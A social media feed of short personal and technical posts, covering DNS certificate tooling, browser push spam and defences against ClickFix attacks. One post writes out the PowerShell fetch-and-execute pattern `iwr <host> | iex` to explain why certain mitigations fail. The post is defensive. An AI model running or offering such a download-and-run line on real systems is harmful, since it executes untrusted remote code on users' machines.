sometimes ian

@ecn
241 Followers
217 Following
2.6K Posts
your friendly neighbourhood crow, always up to no good.
pronounsHe/Him
locationVancouver, BC
websitehttps://ianspence.com
oid1.3.6.1.4.1.61251
sometimes ianFeb 27

Oh you're colourblind? How many colours an I holding up?

*Shoves the entire pantone system directory in your face*

sometimes ianFeb 24

Hey @1password i don't want and never wanted any of your crap ai or watchtower features - what makes you think i'm willing to pay more for features i don't want.

give us a cheaper plan that doesn't come with all the guff.

sometimes ianFeb 17
Did #YouTube accidentally break their RSS feeds or kill that feature off?
Show threadsometimes ianFeb 5

Because there are two DNS servers but they share the same hostname and certificate, I needed to write some tooling to help synchronize the challenge from one machine to the other, along with sharing the certificates once issued/renewed.

So I wrote a quick and simple server and client app: https://git.ecn.io/ian/certsync

certsync

Helper tool for performing ACME operations across two hosts.

git.ecn.io
sometimes ianFeb 5
It took quite a bit of work (less than I feared, thankfully) but my secure DNS servers now use short-lived and IP address validated certificates from @letsencrypt!
sometimes ianJan 21

Browser push notifications remain one of the single largest spam deliverance systems - and all browsers, especially Chrome, are entirely complacent in it.

Google could fix this tomorrow, easily.

They won't.

https://www.infoblox.com/blog/threat-intelligence/inside-a-malicious-push-network-what-57m-logs-taught-us/

Inside a Malicious Push Network: What 57M Logs Taught Us

A DNS misconfiguration allowed us to become an “observer on the side” of a malicious push notification operation. Here’s what we learned.

Infoblox Blog
sometimes ianJan 16
Hello from sunny Vancouver.
sometimes ianJan 11
NO WE ARE NOT.
Show threadsometimes ianJan 8

I've seen some folks talk about PowerShell options to mitigate the risk of #ClickFix, so let's talk about how two of those are ineffective:

Using the command: `iwr <host> | iex`

- Ignores script execution mode, because Invoke-Expression treats input as if the user typed it out themselves
- Ignored constrained language mode for the same reason.

Neither of these are effective in protecting users. A missed opportunity from Microsoft is not blocking iex with CLM.

Show threadsometimes ianJan 8

The big issue with #ClickFix is that there are few effective mitigation tools, but there are some things you should do:

1. Disable the Windows Script Host
2. Remove the run dialog (this also blocks Win+R), also upgrade people to Windows 11.
3. If possible, use WDAC to prohibit users from opening powershell.exe, pwsh.exe, cmd.exe, and mshta.exe

#3 is likely the most effective, but also potentially disruptive to the user if they need command line access or you have scripts that run as the user.